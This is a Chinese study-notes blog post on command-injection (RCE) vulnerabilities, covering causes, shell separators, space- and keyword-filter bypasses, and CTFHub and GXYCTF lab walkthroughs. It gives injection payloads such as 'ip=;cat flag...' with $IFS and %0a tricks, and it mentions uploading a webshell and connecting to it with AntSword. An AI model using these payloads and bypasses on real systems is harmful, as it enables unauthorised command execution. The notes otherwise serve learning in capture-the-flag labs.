当前位置: 首页 > news >正文

7月21日总结

命令执行

RCE

RCEremote code execute):远程命令执行或者代码执行,我们平时说的rce,比如thinkPHP
rce漏洞,即算代码注入漏洞,也算rce漏洞,因为渗透的最终情况可以实现执行命令或者是代码都属于
RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE

命令执行的原理

命令执行漏洞指的是网站的应用程序有些需要调用执行系统命令,当用户能控制这些函数中的参数
时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。
system("cat /flag")

命令执行的成因

1、代码层过滤不严格:商业应用需要执行命令,商业应用的一些核心代码可能封住在二进制文件当中,
web应用中通过system函数调用。
system("/bin/program --arg $arg")
2、调用第三方组件存在的代码执行漏洞:如wordpress,可以选择imagemagick这个常用的图片处理
组件,处理用户上传图片时造成命令执行;还有JAVA struts2/elasticsearch groovy等。

命令执行漏洞分类

1、代码层过滤不严
2、系统的漏洞造成命令注入
3、调用的第三方组件存在代码执行漏洞

RCE

RCEremote code execute):远程命令执行或者代码执行,我们平时说的rce,比如thinkPHP
rce漏洞,即算代码注入漏洞,也算rce漏洞,因为渗透的最终情况可以实现执行命令或者是代码都属于
RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE

命令执行的原理

命令执行漏洞指的是网站的应用程序有些需要调用执行系统命令,当用户能控制这些函数中的参数
时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。
system("cat /flag")

命令执行的成因

1、代码层过滤不严格:商业应用需要执行命令,商业应用的一些核心代码可能封住在二进制文件当中,
web应用中通过system函数调用。
system("/bin/program --arg $arg")
2、调用第三方组件存在的代码执行漏洞:如wordpress,可以选择imagemagick这个常用的图片处理
组件,处理用户上传图片时造成命令执行;还有JAVA struts2/elasticsearch groovy等。

命令执行漏洞分类

1、代码层过滤不严
2、系统的漏洞造成命令注入
3、调用的第三方组件存在代码执行漏洞

启用一个端口为8081的服务器

Windows常用的命令和特殊字符

常用的命令

1dir----查看文件目录
2ipconfig----查看WindowsIP地址
3arp -a----查看ARP缓存表
4calc----在命令行打开计算器
5regedit----打开注册表
6netstat -ano----查看开放的端口信息

特殊字符

1| 直接执行后面的语句
2|| 前面出错执行后面的,前面为假
3& 前面的语句为假则直接执行后面的,前面可真可假
4&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真

Linux常用的命令和特殊字符

常用的命令

1cat /etc/passwd----查看
2passwd文件 id----查看该用户的ID
3groups----查看用户所属的组
4cat /etc/group----查看组信息
5whoami----查看当前用户
6pwd----查看当前路径
7uname -a----查看主机信息
8cat /etc/issue----查看主机的配置信息
9netstat -pantu----查看开放的端口信息
10netstat -nr----查看路由信息

特殊字符

1、; 前面的执行完执行后面的
2| 管道符,显示后面的执行结果
3|| 当前面的执行出错时执行后面的
4& 前面的语句为假则直接执行后面的,前面可真可假
5&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真
6、换行符(编码)
"exec(),echo(),eval()..."点击查看元宝的回答
https://yuanbao.tencent.com/bot/app/share/chat/fhZKut0sp8oO(最底下见)

exec(),echo,eval()

函数作用输入类型输出结果安全风险等级
exec()执行系统命令字符串(命令)命令的最后一行⚠️ 高危(命令注入)
echo输出内容字符串/变量直接显示内容✅ 安全
eval()执行字符串中的代码字符串(代码)代码执行结果☠️ 极高危(代码注入)

第一种方法

上传木马,然后通过蚁剑连接查找flag

第二种方法

利用重定向符

ip=1;ls /> 1.txt  查找根目录
ip=1;ls>1.txt     查找目录
ip=1;cat /flag.txt> 1.txt   查找flag

空格绕过

以ls /举例
{ls,/}

以ls /
ls${IFS}/

使用 < , < 表示的是输入重定向的意思,就是把 < 后面跟的文件取代键盘作为新的输入设备。“命令 <
文件” ,这是将文件作为命令输入
ls</

ls%09/
ls$IFS$9/

[GXYCTF2019]Ping Ping Ping 1

flag,空格被过滤

1,使用传递参数(因为不能出现flag整体)黑名单绕过

2,使用反引号

3,使用base64将cat flag.php编码

ctfhub技能树

命令注入

ip=;ls  查看当前目录  
ip=;cat 883914094984.php  查看源码得到flag

过滤cat

试了一下,这些方法都可以,成功后查询源码即可

过滤空格

试了一下,%09,$IFS$9,${IFS},<重定向符号都可以

直接查询后检查源代码即可

过滤目录分隔符

cat /目录名/文件名和cd 目录名;cat 文件名的区别

点击查看元宝的回答
https://yuanbao.tencent.com/bot/app/share/chat/JVfus9hjYbil

ip;ls  查看当前目录ip;cd flag_is_here;ls  使用cd命令进入flag_is_here  查看其下的文件ip;cd flag_is_here;cat flag_146242307015503.php  打印flag_146242307015503.php检查源码即可

过滤运算符

过滤了&,|,使用;即可

ip=;ls
ip=;cat flag_19386297068450.php

综合过滤练习

这里使用单引号''绕过,这里用$@、$*、""都可以绕过,变量拼接似乎不行

ip=%0als 查看当前目录ip=%0acd$IFS$9fla$1g_is_here%0als   使用cd命令进入flag_is_here,并用ls查看其内容ip=%0acd$IFS$9fla$1g_is_here%0aca$1t$IFS$9fla$1g_146242307015503.php  
打印flag_146242307015503.php然后查看flag

通配符绕过

可以使用通配符绕过
通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使 用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一 个或多个真正的字符

以上内容详细可见(命令执行的PPT)

命令执行漏洞利用及绕过方式总结,从零基础到精通,收藏这篇就够了!_当利用远程命令执行漏洞执行系统命令时,空格被防护代码过滤,以下哪个符号可以替代_命令注入绕过空格-CSDN博客

http://www.lryc.cn/news/595210.html

相关文章:

  • registry-ui docker搭建私有仓库的一些问题笔记
  • 服务器后台崩溃的原因
  • 使用Langchain调用模型上下文协议 (MCP)服务
  • 【未限制消息消费导致数据库CPU告警问题排查及解决方案】
  • WEB前端登陆页面(复习)
  • 随笔20250721 PostgreSQL实体类生成器
  • Elasticsearch X-Pack安全功能未启用的解决方案
  • OpenEuler 22.03 系统上安装配置gitlab runner
  • 笔试——Day14
  • 【PTA数据结构 | C语言版】求单源最短路的Dijkstra算法
  • 打造自己的 Jar 文件分析工具:类名匹配 + 二进制搜索 + 日志输出全搞定
  • Laravel 后台登录 403 Forbidden 错误深度解决方案-优雅草卓伊凡|泡泡龙
  • PHP实战:从原理到落地,解锁Web开发密码
  • 【HarmonyOS】ArkTS语法详细解析
  • Valgrind Cachegrind 全解析:用缓存效率,换系统流畅!
  • NISP-PTE基础实操——代码审计
  • Near Cache
  • 嵌入式学习-土堆目标检测(1)-day26
  • 低代码平台能否完全取代传统前端开发
  • Apache Ignite Binary Object 调优
  • OpenCV计算机视觉实战(16)——图像分割技术
  • 有关Maven的个人笔记总结
  • 【PTA数据结构 | C语言版】双连通分量
  • Spring Boot自动装配原理深度解析:从核心注解到实现机制
  • AWS IoT Core CloudWatch监控完整指南
  • AWS Certified Cloud Practitioner 认证考试 测试题与解析
  • HCL 三层知识总结
  • PyTorch 实现 CIFAR-10 图像分类:从数据预处理到模型训练与评估
  • RAG实战指南 Day 20:大规模向量索引优化技术
  • 轮状太空城的科学依据浅谈